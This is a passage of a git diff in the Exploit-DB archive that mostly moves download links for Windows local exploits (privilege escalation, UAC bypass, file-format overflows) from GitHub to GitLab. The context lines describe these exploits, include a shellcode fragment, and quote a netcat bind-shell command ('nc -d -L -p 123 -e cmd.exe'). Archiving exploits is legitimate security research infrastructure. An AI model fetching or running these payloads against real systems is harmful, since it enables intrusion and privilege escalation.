-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14966.zip (moaub-10-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14966.zip (moaub-10-exploit.zip) ''' ''' diff --git a/exploits/windows/local/14982.py b/exploits/windows/local/14982.py index c05785449..1ca196170 100755 --- a/exploits/windows/local/14982.py +++ b/exploits/windows/local/14982.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub12-adobe-acrobat-and-reader-pushstring-memory-corruption/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14982.zip (moaub-12-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14982.zip (moaub-12-exploit.zip) ''' ''' diff --git a/exploits/windows/local/15022.py b/exploits/windows/local/15022.py index 58558be9f..56725a857 100755 --- a/exploits/windows/local/15022.py +++ b/exploits/windows/local/15022.py @@ -74,4 +74,4 @@ buf += ",0,7462,885953024,4,1,640,480\r\n" #Required file text f = open("sploit.ilj", "w") f.write(buf) -f.close() +f.close() \ No newline at end of file diff --git a/exploits/windows/local/15094.py b/exploits/windows/local/15094.py index 82148b70e..cb32d83da 100755 --- a/exploits/windows/local/15094.py +++ b/exploits/windows/local/15094.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15094.zip (moaub-24-excel-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15094.zip (moaub-24-excel-exploit.zip) ''' ''' diff --git a/exploits/windows/local/15609.txt b/exploits/windows/local/15609.txt index 262d690ad..34f9a98b2 100644 --- a/exploits/windows/local/15609.txt +++ b/exploits/windows/local/15609.txt @@ -3,7 +3,7 @@ A Design Flaw in Windows Kernel API can Lead to privilege escalation. Mirror of Original Post: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/ PoC: http://www.codeproject.com/KB/vista-security/uac.aspx (not available) -mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15609.zip (uacpoc.zip) +mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15609.zip (uacpoc.zip) After running this PoC, just type “whoami” in command prompt to see the escalated user credentials. Points of Interest diff --git a/exploits/windows/local/15624.txt b/exploits/windows/local/15624.txt index 79bd4e66b..5f8df34eb 100644 --- a/exploits/windows/local/15624.txt +++ b/exploits/windows/local/15624.txt @@ -79,4 +79,4 @@ and force execution with kernel priviligies(cpl==0). Exploit code is in CAInternetSecuritySuite2010.zip file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15624.zip (CAInternetSecuritySuite2010.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15624.zip (CAInternetSecuritySuite2010.zip) \ No newline at end of file diff --git a/exploits/windows/local/15696.txt b/exploits/windows/local/15696.txt index 2bc677a20..845c00c41 100644 --- a/exploits/windows/local/15696.txt +++ b/exploits/windows/local/15696.txt @@ -58,4 +58,4 @@ FhUAn0y6pBrAJXLcLiEfINR5hT4MfL52 =zMAG -----END PGP SIGNATURE----- -Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15696.a2w (Off_with_her_head.a2w) \ No newline at end of file +Exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15696.a2w (Off_with_her_head.a2w) \ No newline at end of file diff --git a/exploits/windows/local/15706.txt b/exploits/windows/local/15706.txt index 2223b0438..a9f0dd5c5 100644 --- a/exploits/windows/local/15706.txt +++ b/exploits/windows/local/15706.txt @@ -1,6 +1,6 @@ http://www.kryptoslogic.com/advisories/2010/kryptoslogic-winamp-midi.txt -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15706.c +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15706.c ==-===-=====-=======-===========-=============-================= diff --git a/exploits/windows/local/15761.txt b/exploits/windows/local/15761.txt index c8b5880ea..4e63d03b8 100644 --- a/exploits/windows/local/15761.txt +++ b/exploits/windows/local/15761.txt @@ -473,7 +473,4 @@ printf("cannot dev ctl %u\n",GetLastError()); return 0 ; } return 0; -} - - - +} \ No newline at end of file diff --git a/exploits/windows/local/15762.txt b/exploits/windows/local/15762.txt index 63564686b..ee97d1432 100644 --- a/exploits/windows/local/15762.txt +++ b/exploits/windows/local/15762.txt @@ -616,6 +616,4 @@ push 2 call pqi } return 0; -} - - +} \ No newline at end of file diff --git a/exploits/windows/local/15763.txt b/exploits/windows/local/15763.txt index 740090672..e58e0cb6f 100644 --- a/exploits/windows/local/15763.txt +++ b/exploits/windows/local/15763.txt @@ -301,6 +301,4 @@ push 0 call p } return 0; -} - - +} \ No newline at end of file diff --git a/exploits/windows/local/15764.txt b/exploits/windows/local/15764.txt index 57c349db4..286dcaabf 100644 --- a/exploits/windows/local/15764.txt +++ b/exploits/windows/local/15764.txt @@ -397,6 +397,4 @@ printf("dev ctrl 2 failed %u\n", GetLastError()); return 0 ; } return 0 ; -} - - +} \ No newline at end of file diff --git a/exploits/windows/local/15994.rb b/exploits/windows/local/15994.rb index d4e0ed32e..7a6e7823d 100755 --- a/exploits/windows/local/15994.rb +++ b/exploits/windows/local/15994.rb @@ -88,4 +88,4 @@ begin sleep(1) rescue puts "ERROR TO CREATE THE FILE"+file -end +end \ No newline at end of file diff --git a/exploits/windows/local/16024.txt b/exploits/windows/local/16024.txt index c0e4d01a2..ae93bb706 100644 --- a/exploits/windows/local/16024.txt +++ b/exploits/windows/local/16024.txt @@ -76,10 +76,10 @@ considered valid. DoS: http://aluigi.org/poc/fxscover_1.cov -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/16024-fxscover_1.cov +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/16024-fxscover_1.cov Bind Shell: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/fxscover_1_bind28876.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/fxscover_1_bind28876.zip ####################################################################### diff --git a/exploits/windows/local/17158.txt b/exploits/windows/local/17158.txt index 674f8b65b..4cd81b03f 100644 --- a/exploits/windows/local/17158.txt +++ b/exploits/windows/local/17158.txt @@ -109,7 +109,7 @@ has been created chm_1.chm using the steps listed above. http://aluigi.org/poc/chm_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17158.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17158.zip ####################################################################### diff --git a/exploits/windows/local/17473.txt b/exploits/windows/local/17473.txt index ea5894905..20fbd9511 100644 --- a/exploits/windows/local/17473.txt +++ b/exploits/windows/local/17473.txt @@ -16,4 +16,4 @@ # also check here for The Persian docs of this methods and more : http://www.0days.ir/article/ -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17473.pdf (cve-2011-0611_exploit.pdf) \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17473.pdf (cve-2011-0611_exploit.pdf) \ No newline at end of file diff --git a/exploits/windows/local/17474.txt b/exploits/windows/local/17474.txt index 0d2d8231f..eef540be4 100644 --- a/exploits/windows/local/17474.txt +++ b/exploits/windows/local/17474.txt @@ -149,4 +149,4 @@ stores in stack :D -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17474.doc (cve-2011-3333_exploit.doc) \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17474.doc (cve-2011-3333_exploit.doc) \ No newline at end of file diff --git a/exploits/windows/local/17488.txt b/exploits/windows/local/17488.txt index 9f27ad347..95782d4b3 100644 --- a/exploits/windows/local/17488.txt +++ b/exploits/windows/local/17488.txt @@ -17,4 +17,4 @@ -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17488.xfdf (cve-2004-0194.xfdf.xfdf) \ No newline at end of file +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17488.xfdf (cve-2004-0194.xfdf.xfdf) \ No newline at end of file diff --git a/exploits/windows/local/17820.c b/exploits/windows/local/17820.c index cb7d6763e..1d01b7c8a 100644 --- a/exploits/windows/local/17820.c +++ b/exploits/windows/local/17820.c @@ -239,5 +239,4 @@ int main(int argc, char **argv) } printf("done"); -} - +} \ No newline at end of file diff --git a/exploits/windows/local/18067.txt b/exploits/windows/local/18067.txt index 9e9d6b625..c0c4ab701 100644 --- a/exploits/windows/local/18067.txt +++ b/exploits/windows/local/18067.txt @@ -152,4 +152,4 @@ http://www.abysssec.com/blog/wp-content/uploads/2011/11/MS11-021.zip EDB mirror : -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18067.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18067.zip \ No newline at end of file diff --git a/exploits/windows/local/18372.txt b/exploits/windows/local/18372.txt index f9fab62ce..b6058651e 100644 --- a/exploits/windows/local/18372.txt +++ b/exploits/windows/local/18372.txt @@ -5,7 +5,7 @@ # Tested on: Windows 7 32bit # CVE : CVE-2012-0013 -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18372.docm +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18372.docm Open the document file, then allow the macro execution. This will execute python script (python interpreters are required). diff --git a/exploits/windows/local/19198.txt b/exploits/windows/local/19198.txt index 937bf6b62..0f80e7c2d 100644 --- a/exploits/windows/local/19198.txt +++ b/exploits/windows/local/19198.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/234/info The names and mappings of kernel objects in NT are cached in the "object namespace". In this area, DLL mappings are kept in a section called KnownDlls. By manipulating the namespace, it is possible to redirect calls to arbitrary dlls. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19198.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19198.zip \ No newline at end of file diff --git a/exploits/windows/local/19209.c b/exploits/windows/local/19209.c index 7b8e96c4e..47afb7c1d 100644 --- a/exploits/windows/local/19209.c +++ b/exploits/windows/local/19209.c @@ -75,4 +75,4 @@ ExploitCode[200]=""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ NOTE: The attached exploit code has been compiled to run on Windows NT 4.0 SP4 with msvcrt.dll version 4.20.6201 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19209.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19209.tar.gz \ No newline at end of file diff --git a/exploits/windows/local/19359.txt b/exploits/windows/local/19359.txt index 444d250f0..0578f3cd8 100644 --- a/exploits/windows/local/19359.txt +++ b/exploits/windows/local/19359.txt @@ -6,4 +6,4 @@ This exploit and description provided by Cybermedia Software Private Limited. The simulation consists of one 32-bit application say BEADMIN.EXE and one MS-DOS based application, say SCRNSAVE.EXE. The BEADMIN.EXE when started does the following Creates one event in â??not-signalâ??ed state Sets up the screen saver. The screen saver executable is specified as SCRNSAVE.EXE and the timeout is set to minimum. . BEADMIN.EXE now waits on the event. After some time, the screen saver is triggered. This results in Winlogon.Exe spawning SCRNSAVE.EXE. Since the CreateProcess call returns junk handle to Winlogon.Exe, the setting of primary token fails. Hence the SCRNSAVE.EXE application (NTVDM.EXE) runs in System Context. This SCRNSAVE.EXE again spawns BEADMIN.EXE application. Now this second copy of BEADMIN.EXE inherits the security context of NTVDM which is System Context. This application adds the logged in user to admin group and signals the event on which first instance of BEADMIN.EXE is waiting. In response to this the first copy of BEADMIN.EXE resets back the Screen Saver settings and quits. The logged in user name is passed between the first and second copy of BEADMIN.EXE using shared section. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19359.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19359.zip \ No newline at end of file diff --git a/exploits/windows/local/19401.txt b/exploits/windows/local/19401.txt index 821c4ae45..6f27d0eb7 100644 --- a/exploits/windows/local/19401.txt +++ b/exploits/windows/local/19401.txt @@ -58,10 +58,10 @@ Security manager = null PoC === -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19401.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19401.zip ======== Advisory ======== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19401.pdf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19401.pdf \ No newline at end of file diff --git a/exploits/windows/local/19425.txt b/exploits/windows/local/19425.txt index 558e28a9c..9fe717843 100644 --- a/exploits/windows/local/19425.txt +++ b/exploits/windows/local/19425.txt @@ -40,4 +40,4 @@ After all done, just click in the button "Retrieve Data" and see what happens =) Â -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19425.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19425.zip \ No newline at end of file diff --git a/exploits/windows/local/19502.txt b/exploits/windows/local/19502.txt index ddbc37383..1f4808bd5 100644 --- a/exploits/windows/local/19502.txt +++ b/exploits/windows/local/19502.txt @@ -4,6 +4,6 @@ Any authenticated NT user (ie domain user) can modify the pathname for the RASMA 19502-1.exe will modify the RASMAN/ImagePath key in the Registry with the service executable to be run in its place. 19502-2.exe (author supplied) is a sample trojan service that may be run. This executable runs a service which launches a netcat listener on tcp port 123. (nc -d -L -p 123 -e cmd.exe). (This service may or may not run with errors.) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19502-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19502-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19502-2.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19502-2.exe \ No newline at end of file diff --git a/exploits/windows/local/19594.txt b/exploits/windows/local/19594.txt index 739c8e8af..73ce2b459 100644 --- a/exploits/windows/local/19594.txt +++ b/exploits/windows/local/19594.txt @@ -4,4 +4,4 @@ The spooler service (spoolss.exe) allows local users to add their own dll files This exploit will crash the spooler service and copy a custom dll into c:\winnt\system32. When the spooler service is restarted, the custom dll is loaded and run at SYTEM level. The 'whoami' binary is run and the results logged in a text file for verification. If the target machine's NT directory is not the default c:\winnt, the program will have to be modified. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19594.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19594.zip \ No newline at end of file diff --git a/exploits/windows/local/19633.txt b/exploits/windows/local/19633.txt index 0571fbee7..b396a8a04 100644 --- a/exploits/windows/local/19633.txt +++ b/exploits/windows/local/19633.txt @@ -13,4 +13,4 @@ Now insert 32 characters after the .rtf identifier: {\rtf1\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAansi\deff0\deftab720{\fonttbl...etc...etc When this file is opened in Wordpad, the program will crash. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19633.wri \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19633.wri \ No newline at end of file diff --git a/exploits/windows/local/19733.txt b/exploits/windows/local/19733.txt index 4f77a7e20..6e2fce8d2 100644 --- a/exploits/windows/local/19733.txt +++ b/exploits/windows/local/19733.txt @@ -12,4 +12,4 @@ This exploit will install a 'decoy' executable to the desktop, and install a fil The zip file contains the executable exploit, and source for the installer and the decoy. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19733.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19733.zip \ No newline at end of file diff --git a/exploits/windows/local/19739.txt b/exploits/windows/local/19739.txt index a52cdf877..de9b21dc8 100644 --- a/exploits/windows/local/19739.txt +++ b/exploits/windows/local/19739.txt @@ -12,4 +12,4 @@ This exploit will create a range of folders in th e\Recyycler folder of the sele Usage: RecyclerSnooper #_of_folders driveletter Example: RecyclerSnooper 200 C -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19739.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19739.exe \ No newline at end of file diff --git a/exploits/windows/local/19789.txt b/exploits/windows/local/19789.txt index d6f825d12..d40058282 100644 --- a/exploits/windows/local/19789.txt +++ b/exploits/windows/local/19789.txt @@ -4,4 +4,4 @@ A vulnerability exists within the Microsoft Clip Art Gallery, where a remote use Clip art can be downloaded from any website and incorporated into the local gallery. A particular file format called .CIL is used in order to transport new clip art files to the users. The vulnerability is that a user may open a malformed .CIL file containing a long embedded field downloaded from a malicious third-party website or in the form of an email attachment regardless of it's origin. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19789.bad \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19789.bad \ No newline at end of file diff --git a/exploits/windows/local/19839.txt b/exploits/windows/local/19839.txt index 13f6c2d19..73c5a1dea 100644 --- a/exploits/windows/local/19839.txt +++ b/exploits/windows/local/19839.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1097/info CRYPTOCard CRYPTOAdmin is a network authentication application for use with the Palm OS platform. CRYPTOAdmin generates a .pdb file which contains the username, PIN number, serial number, and key in encrypted or plaintext format. The PIN number can be retrieved due to the software's usage of a fixed 4-byte value in key generation. With access to the .pdb file and PIN number, a user is capable of duplicating the token onto another Palm device effectively gaining access to the network as the compromised user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19839.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19839.zip \ No newline at end of file diff --git a/exploits/windows/local/19855.txt b/exploits/windows/local/19855.txt index 9d6184c46..00b3ed4f4 100644 --- a/exploits/windows/local/19855.txt +++ b/exploits/windows/local/19855.txt @@ -6,4 +6,4 @@ One of the restrictive policies possible is to disable registry editing. However In addition, users can uninstall Panda Security through the Add/Remove Programs applet in the Control Panel. An error message will appear when the user attempts to uninstall Panda Security. However upon reboot, the application will have been successfully uninstalled. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19855.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19855.zip \ No newline at end of file diff --git a/exploits/windows/local/19894.txt b/exploits/windows/local/19894.txt index be6d76c6a..1fb1ed9d5 100644 --- a/exploits/windows/local/19894.txt +++ b/exploits/windows/local/19894.txt @@ -4,4 +4,4 @@ Alladin Knowledge Systems eToken is a USB smartcard-like device used for authent The PIN number can be reset to the default value with the use of standard device programmers. This can be done by physically opening the eToken device (which can be done without leaving any trace or evidence of tampering) and copying the default PIN value to the location used to store either the user PIN or administrator PIN in the serial EEPROM. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19894.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19894.zip \ No newline at end of file diff --git a/exploits/windows/local/20012.txt b/exploits/windows/local/20012.txt index d271640d9..802b4ee6a 100644 --- a/exploits/windows/local/20012.txt +++ b/exploits/windows/local/20012.txt @@ -12,6 +12,6 @@ The first byte will be the length of the key (n), the next (n) bytes are the key 20012-1.exe - Administrator password decryptor for Win 9x/NT. 20012-2.zip - Source code (use TASM). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20012-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20012-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20012-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20012-2.zip \ No newline at end of file diff --git a/exploits/windows/local/20022.txt b/exploits/windows/local/20022.txt index 5b5a0a8c7..7734a1303 100644 --- a/exploits/windows/local/20022.txt +++ b/exploits/windows/local/20022.txt @@ -11,4 +11,4 @@ Other security flaws present in S to Infinity: - File and directory attributes can be modified using the DOS attrib command. StoI file-level protection does not rely on DOS file attributes, so this will not affect StoI settings. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20022.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20022.exe \ No newline at end of file diff --git a/exploits/windows/local/20257.txt b/exploits/windows/local/20257.txt index 8e2539a44..343802b06 100644 --- a/exploits/windows/local/20257.txt +++ b/exploits/windows/local/20257.txt @@ -63,4 +63,4 @@ porttool -c \BaseNamedObjects\Foo3 (in window for porttool -s5b) Enter PID, TID, MID, CID from porttool -s -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20257.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20257.zip \ No newline at end of file diff --git a/exploits/windows/local/20265.txt b/exploits/windows/local/20265.txt index 0586d687f..22699b896 100644 --- a/exploits/windows/local/20265.txt +++ b/exploits/windows/local/20265.txt @@ -13,4 +13,4 @@ start porttool -c \BaseNamedObjects\Foo porttool -s3 \BaseNamedObjects\Foo2 (enter PID, TID, MID from porttool -s ...) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20265.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20265.zip \ No newline at end of file diff --git a/exploits/windows/local/20383.txt b/exploits/windows/local/20383.txt index c6fb99182..fea7ced56 100644 --- a/exploits/windows/local/20383.txt +++ b/exploits/windows/local/20383.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1911/info The ASP ISAPI file parser does not properly execute certain malformed ASP files that contain scripts with the LANGUAGE parameter containing a buffer of over 2200 characters and have the RUNAT value set as 'server'. Depending on the data entered into the buffer, a denial of service attack could be launched or arbitrary code could be executed under the SYSTEM privilege level in the event that a malicious ASP file were locally executed on IIS. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20383.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20383.zip \ No newline at end of file diff --git a/exploits/windows/local/2094.c b/exploits/windows/local/2094.c index 7e5e1dbd6..0f3a26355 100644 --- a/exploits/windows/local/2094.c +++ b/exploits/windows/local/2094.c @@ -271,4 +271,4 @@ void std_err(void) { exit(1); } -// milw0rm.com [2006-07-31] +// milw0rm.com [2006-07-31] \ No newline at end of file diff --git a/exploits/windows/local/21072.txt b/exploits/windows/local/21072.txt index 42a4028bc..0a568450c 100644 --- a/exploits/windows/local/21072.txt +++ b/exploits/windows/local/21072.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/3193/info A vulnerability exists in Microsoft's Internet Information Services 5.0 which could allow a user with write permission to run any code with System privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21072.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21072.zip \ No newline at end of file diff --git a/exploits/windows/local/21096.txt b/exploits/windows/local/21096.txt index dcdc4d2a2..2feeca44a 100644 --- a/exploits/windows/local/21096.txt +++ b/exploits/windows/local/21096.txt @@ -6,4 +6,4 @@ A vulnerability exists which allows a file embedded within an HTML frame in an e If the user attempts to open the file immediately, the action will fail. However, an assembler coded .exe attachment which has had it's extension changed to .bat will execute immediately. Regardless of the extension type, the user is able to save the attachment to disk. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21096.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21096.zip \ No newline at end of file diff --git a/exploits/windows/local/21344.txt b/exploits/windows/local/21344.txt index c1a843aad..122ca8e11 100644 --- a/exploits/windows/local/21344.txt +++ b/exploits/windows/local/21344.txt @@ -6,4 +6,4 @@ The debugging subsystem, which is available to all users, may be used to create 05/06/2002: There have been reports of a mass-mailing worm that exploits this vulnerability using the proof-of-concept exploit. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21344.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21344.zip \ No newline at end of file diff --git a/exploits/windows/local/21690.txt b/exploits/windows/local/21690.txt index 3319e74f5..595dbdfaa 100644 --- a/exploits/windows/local/21690.txt +++ b/exploits/windows/local/21690.txt @@ -10,4 +10,4 @@ Another proof-of-concept has been released by Brett Moore in a paper entitled "S Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21690.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21690.rar \ No newline at end of file diff --git a/exploits/windows/local/21691.txt b/exploits/windows/local/21691.txt index 7860b9f41..3702e7175 100644 --- a/exploits/windows/local/21691.txt +++ b/exploits/windows/local/21691.txt @@ -10,4 +10,4 @@ Another proof-of-concept has been released by Brett Moore in a paper entitled "S Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21691.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21691.zip \ No newline at end of file diff --git a/exploits/windows/local/22193.txt b/exploits/windows/local/22193.txt index 5bf300e37..6cc7b8dea 100644 --- a/exploits/windows/local/22193.txt +++ b/exploits/windows/local/22193.txt @@ -4,4 +4,4 @@ A vulnerability has been discovered in WinRAR. The problem occurs when the affec It has been reported that it is possible for an attacker to exploit this issue to run arbitrary instructions. Commands executed in this manner would be run with the privileges of the vulnerable program. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22193.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22193.zip \ No newline at end of file diff --git a/exploits/windows/local/23096.txt b/exploits/windows/local/23096.txt index 75a67b2cc..8b8738ebc 100644 --- a/exploits/windows/local/23096.txt +++ b/exploits/windows/local/23096.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/8538/info The Microsoft WordPerfect Converter, which ships with Office and a number of other products, is prone to a buffer overrun vulnerability. This could result in execution of malicious, attacker-supplied code when a document with malformed parameters is processed by the component. Exploitation would permit an attacker to execute arbitrary code with the privileges of the user opening the malformed document. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23096.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23096.zip \ No newline at end of file diff --git a/exploits/windows/local/24200.txt b/exploits/windows/local/24200.txt index 07bf3cce8..36a02ab61 100644 --- a/exploits/windows/local/24200.txt +++ b/exploits/windows/local/24200.txt @@ -28,5 +28,4 @@ A local attacker may exploit this condition to disable the affected firewall com printf("Sent.\n"); CloseHandle(hDevice); - } - + } \ No newline at end of file diff --git a/exploits/windows/local/27282.txt b/exploits/windows/local/27282.txt index e7008dd6e..b13f81837 100644 --- a/exploits/windows/local/27282.txt +++ b/exploits/windows/local/27282.txt @@ -11,7 +11,7 @@ Reference: http://mallocat.com/a-journey-to-antivirus-escalation/ Demo: http://mallocat.com/wp-content/uploads/2013/08/win7.swf Exploit code: http://mallocat.com/wp-content/uploads/2013/08/escalate.7z - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27282.7z + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27282.7z Exploit-DB note: Open and read the reference supplied diff --git a/exploits/windows/local/29125.txt b/exploits/windows/local/29125.txt index fe6b61bb0..7cb52d185 100644 --- a/exploits/windows/local/29125.txt +++ b/exploits/windows/local/29125.txt @@ -14,4 +14,4 @@ Reference : http://mallocat.com/another-journey-to-antivirus-escalation/ Demo: http://mallocat.com/wp-content/uploads/2013/10/avira0.swf Exploit code: http://mallocat.com/wp-content/uploads/2013/10/AviraAvipbbExploit.7z -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29125.7z \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29125.7z \ No newline at end of file diff --git a/exploits/windows/local/29374.txt b/exploits/windows/local/29374.txt index 67dba9a76..c02278b99 100644 --- 